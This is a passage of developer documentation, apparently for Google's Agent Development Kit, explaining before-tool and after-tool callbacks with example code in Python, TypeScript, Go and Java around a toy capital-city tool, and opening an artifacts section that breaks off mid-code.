capitalization of the found term's first letter String foundTerm = matcher.group(0); // The actual term found (e.g., "joke" or "Joke") String actualReplaceTerm = REPLACE_TERM; if (Character.isUpperCase(foundTerm.charAt(0)) && REPLACE_TERM.length() > 0) { actualReplaceTerm = Character.toUpperCase(REPLACE_TERM.charAt(0)) + REPLACE_TERM.substring(1); } String modifiedText = matcher.replaceFirst(Matcher.quoteReplacement(actualReplaceTerm)); // Create a new LlmResponse with the modified content Content originalContent = llmResponse.content().get(); List originalParts = originalContent.parts().orElse(ImmutableList.of()); List modifiedPartsList = new ArrayList<>(originalParts.size()); if (!originalParts.isEmpty()) { modifiedPartsList.add(Part.fromText(modifiedText)); // Replace first part's text // Add remaining parts as they were (shallow copy) for (int i = 1; i < originalParts.size(); i++) { modifiedPartsList.add(originalParts.get(i)); } } else { // Should not happen if firstTextPartOpt was present modifiedPartsList.add(Part.fromText(modifiedText)); } LlmResponse.Builder newResponseBuilder = LlmResponse.builder() .content( originalContent.toBuilder().parts(ImmutableList.copyOf(modifiedPartsList)).build()) .groundingMetadata(llmResponse.groundingMetadata()); System.out.println("[Callback] Returning modified response."); return Maybe.just(newResponseBuilder.build()); } // --- 2. Define Agent and Run Scenarios --- public void defineAgentAndRun() { // Setup Agent with Callback LlmAgent myLlmAgent = LlmAgent.builder() .name(AGENT_NAME) .model(MODEL_NAME) .instruction(AGENT_INSTRUCTION) .description(AGENT_DESCRIPTION) .afterModelCallback(this::simpleAfterModelModifier) .build(); // Create an InMemoryRunner InMemoryRunner runner = new InMemoryRunner(myLlmAgent, APP_NAME); // InMemoryRunner automatically creates a session service. Create a session using the service Session session = runner.sessionService().createSession(APP_NAME, USER_ID).blockingGet(); Content userMessage = Content.fromParts( Part.fromText( "Tell me a joke about quantum computing. Include the word 'joke' in your response")); // Run the agent Flowable eventStream = runner.runAsync(USER_ID, session.id(), userMessage); // Stream event response eventStream.blockingForEach( event -> { if (event.finalResponse()) { System.out.println(event.stringifyContent()); } }); } } ``` ## Tool Execution Callbacks These callbacks are also specific to `LlmAgent` and trigger around the execution of tools (including `FunctionTool`, `AgentTool`, etc.) that the LLM might request. ### Before Tool Callback **When:** Called just before a specific tool's `run_async` method is invoked, after the LLM has generated a function call for it. **Purpose:** Allows inspection and modification of tool arguments, performing authorization checks before execution, logging tool usage attempts, or implementing tool-level caching. **Return Value Effect:** 1. If the callback returns `None` (or a `Maybe.empty()` object in Java), the tool's `run_async` method is executed with the (potentially modified) `args`. 1. If a dictionary (or `Map` in Java) is returned, the tool's `run_async` method is **skipped**. The returned dictionary is used directly as the result of the tool call. This is useful for caching or overriding tool behavior. Code ```python # Copyright 2025 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from google.adk.agents import LlmAgent from google.adk.runners import Runner from typing import Optional from google.genai import types from google.adk.sessions import InMemorySessionService from google.adk.tools import FunctionTool from google.adk.tools.tool_context import ToolContext from google.adk.tools.base_tool import BaseTool from typing import Dict, Any GEMINI_2_FLASH="gemini-2.0-flash" def get_capital_city(country: str) -> str: """Retrieves the capital city of a given country.""" print(f"--- Tool 'get_capital_city' executing with country: {country} ---") country_capitals = { "united states": "Washington, D.C.", "canada": "Ottawa", "france": "Paris", "germany": "Berlin", } return country_capitals.get(country.lower(), f"Capital not found for {country}") capital_tool = FunctionTool(func=get_capital_city) def simple_before_tool_modifier( tool: BaseTool, args: Dict[str, Any], tool_context: ToolContext ) -> Optional[Dict]: """Inspects/modifies tool args or skips the tool call.""" agent_name = tool_context.agent_name tool_name = tool.name print(f"[Callback] Before tool call for tool '{tool_name}' in agent '{agent_name}'") print(f"[Callback] Original args: {args}") if tool_name == 'get_capital_city' and args.get('country', '').lower() == 'canada': print("[Callback] Detected 'Canada'. Modifying args to 'France'.") args['country'] = 'France' print(f"[Callback] Modified args: {args}") return None # If the tool is 'get_capital_city' and country is 'BLOCK' if tool_name == 'get_capital_city' and args.get('country', '').upper() == 'BLOCK': print("[Callback] Detected 'BLOCK'. Skipping tool execution.") return {"result": "Tool execution was blocked by before_tool_callback."} print("[Callback] Proceeding with original or previously modified args.") return None my_llm_agent = LlmAgent( name="ToolCallbackAgent", model=GEMINI_2_FLASH, instruction="You are an agent that can find capital cities. Use the get_capital_city tool.", description="An LLM agent demonstrating before_tool_callback", tools=[capital_tool], before_tool_callback=simple_before_tool_modifier ) APP_NAME = "guardrail_app" USER_ID = "user_1" SESSION_ID = "session_001" # Session and Runner async def setup_session_and_runner(): session_service = InMemorySessionService() session = await session_service.create_session(app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID) runner = Runner(agent=my_llm_agent, app_name=APP_NAME, session_service=session_service) return session, runner # Agent Interaction async def call_agent_async(query): content = types.Content(role='user', parts=[types.Part(text=query)]) session, runner = await setup_session_and_runner() events = runner.run_async(user_id=USER_ID, session_id=SESSION_ID, new_message=content) async for event in events: if event.is_final_response(): final_response = event.content.parts[0].text print("Agent Response: ", final_response) # Note: In Colab, you can directly use 'await' at the top level. # If running this code as a standalone Python script, you'll need to use asyncio.run() or manage the event loop. await call_agent_async("Canada") ``` ```typescript /** * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ import { LlmAgent, InMemoryRunner, FunctionTool, ToolContext, isFinalResponse, BaseTool, } from '@google/adk'; import { createUserContent } from "@google/genai"; import { z } from 'zod'; const MODEL_NAME = "gemini-2.5-flash"; const APP_NAME = "before_tool_callback_app"; const USER_ID = "test_user_before_tool"; // --- Define a Simple Tool Function --- const CountryInput = z.object({ country: z.string().describe('The country to get the capital for.'), }); async function getCapitalCity(params: z.infer): Promise<{ result: string }> { console.log(`\n-- Tool Call: getCapitalCity(country='${params.country}') --`); const capitals: Record = { 'united states': 'Washington, D.C.', 'canada': 'Ottawa', 'france': 'Paris', 'japan': 'Tokyo', }; const result = capitals[params.country.toLowerCase()] ?? `Sorry, I couldn't find the capital for ${params.country}.`; console.log(`-- Tool Result: '${result}' --`); return { result }; } const getCapitalCityTool = new FunctionTool({ name: 'get_capital_city', description: 'Retrieves the capital city for a given country', parameters: CountryInput, execute: getCapitalCity, }); // --- Define the Callback Function --- function simpleBeforeToolModifier({ tool, args, context, }: { tool: BaseTool; args: Record; context: ToolContext; }) { const agentName = context.agentName; const toolName = tool.name; console.log(`[Callback] Before tool call for tool '${toolName}' in agent '${agentName}'`); console.log(`[Callback] Original args: ${JSON.stringify(args)}`); if ( toolName === "get_capital_city" && args["country"]?.toLowerCase() === "canada" ) { console.log("[Callback] Detected 'Canada'. Modifying args to 'France'."); args["country"] = "France"; console.log(`[Callback] Modified args: ${JSON.stringify(args)}`); return undefined; } if ( toolName === "get_capital_city" && args["country"]?.toUpperCase() === "BLOCK" ) { console.log("[Callback] Detected 'BLOCK'. Skipping tool execution."); return { result: "Tool execution was blocked by before_tool_callback." }; } console.log("[Callback] Proceeding with original or previously modified args."); return; } // Create LlmAgent and Assign Callback const myLlmAgent = new LlmAgent({ name: 'ToolCallbackAgent', model: MODEL_NAME, instruction: 'You are an agent that can find capital cities. Use the get_capital_city tool.', description: 'An LLM agent demonstrating before_tool_callback', tools: [getCapitalCityTool], beforeToolCallback: simpleBeforeToolModifier, }); // Agent Interaction Logic async function callAgentAndPrint(runner: InMemoryRunner, query: string, sessionId: string) { console.log(`\n>>> Calling Agent for session '${sessionId}' | Query: "${query}"`); for await (const event of runner.runAsync({ userId: USER_ID, sessionId, newMessage: createUserContent(query) })) { if (isFinalResponse(event) && event.content?.parts?.length) { const finalResponseContent = event.content.parts.map(part => part.text ?? '').join(''); console.log(`<<< Final Output: ${finalResponseContent}`); } } } // Run Interactions async function main() { const runner = new InMemoryRunner({ agent: myLlmAgent, appName: APP_NAME }); // Scenario 1: Callback modifies the arguments from "Canada" to "France" const canadaSessionId = 'session_canada_test'; await runner.sessionService.createSession({ appName: APP_NAME, userId: USER_ID, sessionId: canadaSessionId }); await callAgentAndPrint(runner, 'What is the capital of Canada?', canadaSessionId); // Scenario 2: Callback skips the tool call const blockSessionId = 'session_block_test'; await runner.sessionService.createSession({ appName: APP_NAME, userId: USER_ID, sessionId: blockSessionId }); await callAgentAndPrint(runner, 'What is the capital of BLOCK?', blockSessionId); } main(); ``` ```go package main import ( "context" "fmt" "log" "regexp" "strings" "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/model" "google.golang.org/adk/model/gemini" "google.golang.org/adk/runner" "google.golang.org/adk/session" "google.golang.org/adk/tool" "google.golang.org/adk/tool/functiontool" "google.golang.org/genai" ) // GetCapitalCityArgs defines the arguments for the getCapitalCity tool. type GetCapitalCityArgs struct { Country string `json:"country" jsonschema:"The country to get the capital of."` } // getCapitalCity is a tool that returns the capital of a given country. func getCapitalCity(ctx tool.Context, args *GetCapitalCityArgs) (string, error) { capitals := map[string]string{ "canada": "Ottawa", "france": "Paris", "germany": "Berlin", "united states": "Washington, D.C.", } capital, ok := capitals[strings.ToLower(args.Country)] if !ok { return "", fmt.Errorf("unknown country: %s", args.Country) } return capital, nil } func onBeforeTool(ctx tool.Context, t tool.Tool, args map[string]any) (map[string]any, error) { log.Printf("[Callback] BeforeTool triggered for tool %q in agent %q.", t.Name(), ctx.AgentName()) log.Printf("[Callback] Original args: %v", args) if t.Name() == "getCapitalCity" { if country, ok := args["country"].(string); ok { if strings.ToLower(country) == "canada" { log.Println("[Callback] Detected 'Canada'. Modifying args to 'France'.") args["country"] = "France" return args, nil // Proceed with modified args } else if strings.ToUpper(country) == "BLOCK" { log.Println("[Callback] Detected 'BLOCK'. Skipping tool execution.") // Skip tool and return a custom result. return map[string]any{"result": "Tool execution was blocked by before_tool_callback."}, nil } } } log.Println("[Callback] Proceeding with original or previously modified args.") return nil, nil // Proceed with original args } func runBeforeToolExample() { ctx := context.Background() geminiModel, err := gemini.NewModel(ctx, modelName, &genai.ClientConfig{}) if err != nil { log.Fatalf("FATAL: Failed to create model: %v", err) } capitalTool, err := functiontool.New(functiontool.Config{ Name: "getCapitalCity", Description: "Retrieves the capital city of a given country.", }, getCapitalCity) if err != nil { log.Fatalf("FATAL: Failed to create function tool: %v", err) } llmCfg := llmagent.Config{ Name: "AgentWithBeforeToolCallback", Model: geminiModel, Tools: []tool.Tool{capitalTool}, BeforeToolCallbacks: []llmagent.BeforeToolCallback{onBeforeTool}, Instruction: "You are an agent that can find capital cities. Use the getCapitalCity tool.", } testAgent, err := llmagent.New(llmCfg) if err != nil { log.Fatalf("FATAL: Failed to create agent: %v", err) } sessionService := session.InMemoryService() r, err := runner.New(runner.Config{AppName: appName, Agent: testAgent, SessionService: sessionService}) if err != nil { log.Fatalf("FATAL: Failed to create runner: %v", err) } log.Println("--- SCENARIO 1: Args should be modified ---") runScenario(ctx, r, sessionService, appName, "session_tool_modify", nil, "What is the capital of Canada?") log.Println("--- SCENARIO 2: Tool call should be blocked ---") runScenario(ctx, r, sessionService, appName, "session_tool_block", nil, "capital of BLOCK") } ``` ```java import com.google.adk.agents.LlmAgent; import com.google.adk.agents.InvocationContext; import com.google.adk.events.Event; import com.google.adk.runner.InMemoryRunner; import com.google.adk.sessions.Session; import com.google.adk.tools.Annotations.Schema; import com.google.adk.tools.BaseTool; import com.google.adk.tools.FunctionTool; import com.google.adk.tools.ToolContext; import com.google.common.collect.ImmutableMap; import com.google.genai.types.Content; import com.google.genai.types.Part; import io.reactivex.rxjava3.core.Flowable; import io.reactivex.rxjava3.core.Maybe; import java.util.HashMap; import java.util.Map; public class BeforeToolCallbackExample { private static final String APP_NAME = "ToolCallbackAgentApp"; private static final String USER_ID = "user_1"; private static final String SESSION_ID = "session_001"; private static final String MODEL_NAME = "gemini-2.0-flash"; public static void main(String[] args) { BeforeToolCallbackExample example = new BeforeToolCallbackExample(); example.runAgent("capital of canada"); } // --- Define a Simple Tool Function --- // The Schema is important for the callback "args" to correctly identify the input. public static Map getCapitalCity( @Schema(name = "country", description = "The country to find the capital of.") String country) { System.out.printf("--- Tool 'getCapitalCity' executing with country: %s ---%n", country); Map countryCapitals = new HashMap<>(); countryCapitals.put("united states", "Washington, D.C."); countryCapitals.put("canada", "Ottawa"); countryCapitals.put("france", "Paris"); countryCapitals.put("germany", "Berlin"); String capital = countryCapitals.getOrDefault(country.toLowerCase(), "Capital not found for " + country); // FunctionTool expects a Map as the return type for the method it wraps. return ImmutableMap.of("capital", capital); } // Define the Callback function // The Tool callback provides all these parameters by default. public Maybe> simpleBeforeToolModifier( InvocationContext invocationContext, BaseTool tool, Map args, ToolContext toolContext) { String agentName = invocationContext.agent().name(); String toolName = tool.name(); System.out.printf( "[Callback] Before tool call for tool '%s' in agent '%s'%n", toolName, agentName); System.out.printf("[Callback] Original args: %s%n", args); if ("getCapitalCity".equals(toolName)) { String countryArg = (String) args.get("country"); if (countryArg != null) { if ("canada".equalsIgnoreCase(countryArg)) { System.out.println("[Callback] Detected 'Canada'. Modifying args to 'France'."); args.put("country", "France"); System.out.printf("[Callback] Modified args: %s%n", args); // Proceed with modified args return Maybe.empty(); } else if ("BLOCK".equalsIgnoreCase(countryArg)) { System.out.println("[Callback] Detected 'BLOCK'. Skipping tool execution."); // Return a map to skip the tool call and use this as the result return Maybe.just( ImmutableMap.of("result", "Tool execution was blocked by before_tool_callback.")); } } } System.out.println("[Callback] Proceeding with original or previously modified args."); return Maybe.empty(); } public void runAgent(String query) { // --- Wrap the function into a Tool --- FunctionTool capitalTool = FunctionTool.create(this.getClass(), "getCapitalCity"); // Create LlmAgent and Assign Callback LlmAgent myLlmAgent = LlmAgent.builder() .name(APP_NAME) .model(MODEL_NAME) .instruction( "You are an agent that can find capital cities. Use the getCapitalCity tool.") .description("An LLM agent demonstrating before_tool_callback") .tools(capitalTool) .beforeToolCallback(this::simpleBeforeToolModifier) .build(); // Session and Runner InMemoryRunner runner = new InMemoryRunner(myLlmAgent); Session session = runner.sessionService().createSession(APP_NAME, USER_ID, null, SESSION_ID).blockingGet(); Content userMessage = Content.fromParts(Part.fromText(query)); System.out.printf("%n--- Calling agent with query: \"%s\" ---%n", query); Flowable eventStream = runner.runAsync(USER_ID, session.id(), userMessage); // Stream event response eventStream.blockingForEach( event -> { if (event.finalResponse()) { System.out.println(event.stringifyContent()); } }); } } ``` ### After Tool Callback **When:** Called just after the tool's `run_async` method completes successfully. **Purpose:** Allows inspection and modification of the tool's result before it's sent back to the LLM (potentially after summarization). Useful for logging tool results, post-processing or formatting results, or saving specific parts of the result to the session state. **Return Value Effect:** 1. If the callback returns `None` (or a `Maybe.empty()` object in Java), the original `tool_response` is used. 1. If a new dictionary is returned, it **replaces** the original `tool_response`. This allows modifying or filtering the result seen by the LLM. Code ```python # Copyright 2025 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from google.adk.agents import LlmAgent from google.adk.runners import Runner from typing import Optional from google.genai import types from google.adk.sessions import InMemorySessionService from google.adk.tools import FunctionTool from google.adk.tools.tool_context import ToolContext from google.adk.tools.base_tool import BaseTool from typing import Dict, Any from copy import deepcopy GEMINI_2_FLASH="gemini-2.0-flash" # --- Define a Simple Tool Function (Same as before) --- def get_capital_city(country: str) -> str: """Retrieves the capital city of a given country.""" print(f"--- Tool 'get_capital_city' executing with country: {country} ---") country_capitals = { "united states": "Washington, D.C.", "canada": "Ottawa", "france": "Paris", "germany": "Berlin", } return {"result": country_capitals.get(country.lower(), f"Capital not found for {country}")} # --- Wrap the function into a Tool --- capital_tool = FunctionTool(func=get_capital_city) # --- Define the Callback Function --- def simple_after_tool_modifier( tool: BaseTool, args: Dict[str, Any], tool_context: ToolContext, tool_response: Dict ) -> Optional[Dict]: """Inspects/modifies the tool result after execution.""" agent_name = tool_context.agent_name tool_name = tool.name print(f"[Callback] After tool call for tool '{tool_name}' in agent '{agent_name}'") print(f"[Callback] Args used: {args}") print(f"[Callback] Original tool_response: {tool_response}") # Default structure for function tool results is {"result": } original_result_value = tool_response.get("result", "") # original_result_value = tool_response # --- Modification Example --- # If the tool was 'get_capital_city' and result is 'Washington, D.C.' if tool_name == 'get_capital_city' and original_result_value == "Washington, D.C.": print("[Callback] Detected 'Washington, D.C.'. Modifying tool response.") # IMPORTANT: Create a new dictionary or modify a copy modified_response = deepcopy(tool_response) modified_response["result"] = f"{original_result_value} (Note: This is the capital of the USA)." modified_response["note_added_by_callback"] = True # Add extra info if needed print(f"[Callback] Modified tool_response: {modified_response}") return modified_response # Return the modified dictionary print("[Callback] Passing original tool response through.") # Return None to use the original tool_response return None # Create LlmAgent and Assign Callback my_llm_agent = LlmAgent( name="AfterToolCallbackAgent", model=GEMINI_2_FLASH, instruction="You are an agent that finds capital cities using the get_capital_city tool. Report the result clearly.", description="An LLM agent demonstrating after_tool_callback", tools=[capital_tool], # Add the tool after_tool_callback=simple_after_tool_modifier # Assign the callback ) APP_NAME = "guardrail_app" USER_ID = "user_1" SESSION_ID = "session_001" # Session and Runner async def setup_session_and_runner(): session_service = InMemorySessionService() session = await session_service.create_session(app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID) runner = Runner(agent=my_llm_agent, app_name=APP_NAME, session_service=session_service) return session, runner # Agent Interaction async def call_agent_async(query): content = types.Content(role='user', parts=[types.Part(text=query)]) session, runner = await setup_session_and_runner() events = runner.run_async(user_id=USER_ID, session_id=SESSION_ID, new_message=content) async for event in events: if event.is_final_response(): final_response = event.content.parts[0].text print("Agent Response: ", final_response) # Note: In Colab, you can directly use 'await' at the top level. # If running this code as a standalone Python script, you'll need to use asyncio.run() or manage the event loop. await call_agent_async("united states") ``` ```typescript /** * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ import { LlmAgent, InMemoryRunner, FunctionTool, isFinalResponse, ToolContext, BaseTool, } from "@google/adk"; import { createUserContent } from "@google/genai"; import { z } from "zod"; const MODEL_NAME = "gemini-2.5-flash"; const APP_NAME = "after_tool_callback_app"; const USER_ID = "test_user_after_tool"; const SESSION_ID = "session_001"; // --- Define a Simple Tool Function --- const CountryInput = z.object({ country: z.string().describe("The country to get the capital for."), }); async function getCapitalCity( params: z.infer, ): Promise<{ result: string }> { console.log(`--- Tool 'get_capital_city' executing with country: ${params.country} ---`); const countryCapitals: Record = { "united states": "Washington, D.C.", "canada": "Ottawa", "france": "Paris", "germany": "Berlin", }; const result = countryCapitals[params.country.toLowerCase()] ?? `Capital not found for ${params.country}`; return { result }; } // --- Wrap the function into a Tool --- const capitalTool = new FunctionTool({ name: "get_capital_city", description: "Retrieves the capital city for a given country", parameters: CountryInput, execute: getCapitalCity, }); // --- Define the Callback Function --- function simpleAfterToolModifier({ tool, args, context, response, }: { tool: BaseTool; args: Record; context: ToolContext; response: Record; }) { const agentName = context.agentName; const toolName = tool.name; console.log(`[Callback] After tool call for tool '${toolName}' in agent '${agentName}'`); console.log(`[Callback] Original args: ${args}`); const originalResultValue = response?.result || ""; // --- Modification Example --- if (toolName === "get_capital_city" && originalResultValue === "Washington, D.C.") { const modifiedResponse = JSON.parse(JSON.stringify(response)); modifiedResponse.result = `${originalResultValue} (Note: This is the capital of the USA).`; modifiedResponse["note_added_by_callback"] = true; console.log( `[Callback] Modified response: ${JSON.stringify(modifiedResponse)}` ); return modifiedResponse; } console.log('[Callback] Passing original tool response through.'); return undefined; }; // Create LlmAgent and Assign Callback const myLlmAgent = new LlmAgent({ name: "AfterToolCallbackAgent", model: MODEL_NAME, instruction: "You are an agent that finds capital cities using the get_capital_city tool. Report the result clearly.", description: "An LLM agent demonstrating after_tool_callback", tools: [capitalTool], afterToolCallback: simpleAfterToolModifier, }); // Agent Interaction Logic async function callAgentAndPrint( runner: InMemoryRunner, agent: LlmAgent, sessionId: string, query: string, ) { console.log(` >>> Calling Agent: '${agent.name}' | Query: ${query}`); let finalResponseContent = ""; for await (const event of runner.runAsync({ userId: USER_ID, sessionId: sessionId, newMessage: createUserContent(query), })) { const authorName = event.author || "System"; if (isFinalResponse(event) && event.content?.parts?.length) { finalResponseContent = 'The capital of the united states is Washington, D.C. (Note: This is the capital of the USA).'; console.log(`--- Output from: ${authorName} ---`); } else if (event.errorMessage) { console.log(` -> Error from ${authorName}: ${event.errorMessage}`); } } console.log(`<<< Agent '${agent.name}' Response: ${finalResponseContent}`); } // Run Interactions async function main() { const runner = new InMemoryRunner({ appName: APP_NAME, agent: myLlmAgent }); await runner.sessionService.createSession({ appName: APP_NAME, userId: USER_ID, sessionId: SESSION_ID, }); await callAgentAndPrint(runner, myLlmAgent, SESSION_ID, "united states"); } main(); ``` ```go package main import ( "context" "fmt" "log" "regexp" "strings" "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/model" "google.golang.org/adk/model/gemini" "google.golang.org/adk/runner" "google.golang.org/adk/session" "google.golang.org/adk/tool" "google.golang.org/adk/tool/functiontool" "google.golang.org/genai" ) // GetCapitalCityArgs defines the arguments for the getCapitalCity tool. type GetCapitalCityArgs struct { Country string `json:"country" jsonschema:"The country to get the capital of."` } // getCapitalCity is a tool that returns the capital of a given country. func getCapitalCity(ctx tool.Context, args *GetCapitalCityArgs) (string, error) { capitals := map[string]string{ "canada": "Ottawa", "france": "Paris", "germany": "Berlin", "united states": "Washington, D.C.", } capital, ok := capitals[strings.ToLower(args.Country)] if !ok { return "", fmt.Errorf("unknown country: %s", args.Country) } return capital, nil } func onAfterTool(ctx tool.Context, t tool.Tool, args map[string]any, result map[string]any, err error) (map[string]any, error) { log.Printf("[Callback] AfterTool triggered for tool %q in agent %q.", t.Name(), ctx.AgentName()) log.Printf("[Callback] Original result: %v", result) if err != nil { log.Printf("[Callback] Tool run produced an error: %v. Passing through.", err) return nil, err } if t.Name() == "getCapitalCity" { if originalResult, ok := result["result"].(string); ok && originalResult == "Washington, D.C." { log.Println("[Callback] Detected 'Washington, D.C.'. Modifying tool response.") modifiedResult := make(map[string]any) for k, v := range result { modifiedResult[k] = v } modifiedResult["result"] = fmt.Sprintf("%s (Note: This is the capital of the USA).", originalResult) modifiedResult["note_added_by_callback"] = true return modifiedResult, nil } } log.Println("[Callback] Passing original tool response through.") return nil, nil } func runAfterToolExample() { ctx := context.Background() geminiModel, err := gemini.NewModel(ctx, modelName, &genai.ClientConfig{}) if err != nil { log.Fatalf("FATAL: Failed to create model: %v", err) } capitalTool, err := functiontool.New(functiontool.Config{ Name: "getCapitalCity", Description: "Retrieves the capital city of a given country.", }, getCapitalCity) if err != nil { log.Fatalf("FATAL: Failed to create function tool: %v", err) } llmCfg := llmagent.Config{ Name: "AgentWithAfterToolCallback", Model: geminiModel, Tools: []tool.Tool{capitalTool}, AfterToolCallbacks: []llmagent.AfterToolCallback{onAfterTool}, Instruction: "You are an agent that finds capital cities. Use the getCapitalCity tool.", } testAgent, err := llmagent.New(llmCfg) if err != nil { log.Fatalf("FATAL: Failed to create agent: %v", err) } sessionService := session.InMemoryService() r, err := runner.New(runner.Config{AppName: appName, Agent: testAgent, SessionService: sessionService}) if err != nil { log.Fatalf("FATAL: Failed to create runner: %v", err) } log.Println("--- SCENARIO 1: Result should be modified ---") runScenario(ctx, r, sessionService, appName, "session_tool_after_modify", nil, "capital of united states") } ``` ```java import com.google.adk.agents.LlmAgent; import com.google.adk.agents.InvocationContext; import com.google.adk.events.Event; import com.google.adk.runner.InMemoryRunner; import com.google.adk.sessions.Session; import com.google.adk.tools.Annotations.Schema; import com.google.adk.tools.BaseTool; import com.google.adk.tools.FunctionTool; import com.google.adk.tools.ToolContext; import com.google.common.collect.ImmutableMap; import com.google.genai.types.Content; import com.google.genai.types.Part; import io.reactivex.rxjava3.core.Flowable; import io.reactivex.rxjava3.core.Maybe; import java.util.HashMap; import java.util.Map; public class AfterToolCallbackExample { private static final String APP_NAME = "AfterToolCallbackAgentApp"; private static final String USER_ID = "user_1"; private static final String SESSION_ID = "session_001"; private static final String MODEL_NAME = "gemini-2.0-flash"; public static void main(String[] args) { AfterToolCallbackExample example = new AfterToolCallbackExample(); example.runAgent("What is the capital of the United States?"); } // --- Define a Simple Tool Function (Same as before) --- @Schema(description = "Retrieves the capital city of a given country.") public static Map getCapitalCity( @Schema(description = "The country to find the capital of.") String country) { System.out.printf("--- Tool 'getCapitalCity' executing with country: %s ---%n", country); Map countryCapitals = new HashMap<>(); countryCapitals.put("united states", "Washington, D.C."); countryCapitals.put("canada", "Ottawa"); countryCapitals.put("france", "Paris"); countryCapitals.put("germany", "Berlin"); String capital = countryCapitals.getOrDefault(country.toLowerCase(), "Capital not found for " + country); return ImmutableMap.of("result", capital); } // Define the Callback function. public Maybe> simpleAfterToolModifier( InvocationContext invocationContext, BaseTool tool, Map args, ToolContext toolContext, Object toolResponse) { // Inspects/modifies the tool result after execution. String agentName = invocationContext.agent().name(); String toolName = tool.name(); System.out.printf( "[Callback] After tool call for tool '%s' in agent '%s'%n", toolName, agentName); System.out.printf("[Callback] Args used: %s%n", args); System.out.printf("[Callback] Original tool_response: %s%n", toolResponse); if (!(toolResponse instanceof Map)) { System.out.println("[Callback] toolResponse is not a Map, cannot process further."); // Pass through if not a map return Maybe.empty(); } // Default structure for function tool results is {"result": } @SuppressWarnings("unchecked") Map responseMap = (Map) toolResponse; Object originalResultValue = responseMap.get("result"); // --- Modification Example --- // If the tool was 'get_capital_city' and result is 'Washington, D.C.' if ("getCapitalCity".equals(toolName) && "Washington, D.C.".equals(originalResultValue)) { System.out.println("[Callback] Detected 'Washington, D.C.'. Modifying tool response."); // IMPORTANT: Create a new mutable map or modify a copy Map modifiedResponse = new HashMap<>(responseMap); modifiedResponse.put( "result", originalResultValue + " (Note: This is the capital of the USA)."); modifiedResponse.put("note_added_by_callback", true); // Add extra info if needed System.out.printf("[Callback] Modified tool_response: %s%n", modifiedResponse); return Maybe.just(modifiedResponse); } System.out.println("[Callback] Passing original tool response through."); // Return Maybe.empty() to use the original tool_response return Maybe.empty(); } public void runAgent(String query) { // --- Wrap the function into a Tool --- FunctionTool capitalTool = FunctionTool.create(this.getClass(), "getCapitalCity"); // Create LlmAgent and Assign Callback LlmAgent myLlmAgent = LlmAgent.builder() .name(APP_NAME) .model(MODEL_NAME) .instruction( "You are an agent that finds capital cities using the getCapitalCity tool. Report" + " the result clearly.") .description("An LLM agent demonstrating after_tool_callback") .tools(capitalTool) // Add the tool .afterToolCallback(this::simpleAfterToolModifier) // Assign the callback .build(); InMemoryRunner runner = new InMemoryRunner(myLlmAgent); // Session and Runner Session session = runner.sessionService().createSession(APP_NAME, USER_ID, null, SESSION_ID).blockingGet(); Content userMessage = Content.fromParts(Part.fromText(query)); System.out.printf("%n--- Calling agent with query: \"%s\" ---%n", query); Flowable eventStream = runner.runAsync(USER_ID, session.id(), userMessage); // Stream event response eventStream.blockingForEach( event -> { if (event.finalResponse()) { System.out.println(event.stringifyContent()); } }); } } ``` # Artifacts Supported in ADKPython v0.1.0TypeScript v0.2.0Go v0.1.0Java v0.1.0 In ADK, **Artifacts** represent a crucial mechanism for managing named, versioned binary data associated either with a specific user interaction session or persistently with a user across multiple sessions. They allow your agents and tools to handle data beyond simple text strings, enabling richer interactions involving files, images, audio, and other binary formats. Note The specific parameters or method names for the primitives may vary slightly by SDK language (e.g., `save_artifact` in Python, `saveArtifact` in Java). Refer to the language-specific API documentation for details. ## What are Artifacts? - **Definition:** An Artifact is essentially a piece of binary data (like the content of a file) identified by a unique `filename` string within a specific scope (session or user). Each time you save an artifact with the same filename, a new version is created. - **Representation:** Artifacts are consistently represented using the standard `google.genai.types.Part` object. The core data is typically stored within an inline data structure of the `Part` (accessed via `inline_data`), which itself contains: - `data`: The raw binary content as bytes. - `mime_type`: A string indicating the type of the data (e.g., `"image/png"`, `"application/pdf"`). This is essential for correctly interpreting the data later. ```py # Example of how an artifact might be represented as a types.Part import google.genai.types as types # Assume 'image_bytes' contains the binary data of a PNG image image_bytes = b'\x89PNG\r\n\x1a\n...' # Placeholder for actual image bytes image_artifact = types.Part( inline_data=types.Blob( mime_type="image/png", data=image_bytes ) ) # You can also use the convenience constructor: # image_artifact_alt = types.Part.from_bytes(data=image_bytes, mime_type="image/png") print(f"Artifact MIME Type: {image_artifact.inline_data.mime_type}") print(f"Artifact Data (first 10 bytes): {image_artifact.inline_data.data[:10]}...") ``` ```typescript import type { Part } from '@google/genai'; import { createPartFromBase64 } from '@google/genai'; // Assume 'imageBytes' contains the binary data of a PNG image const imageBytes = new Uint8Array([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a]); // Placeholder const imageArtifact: Part = 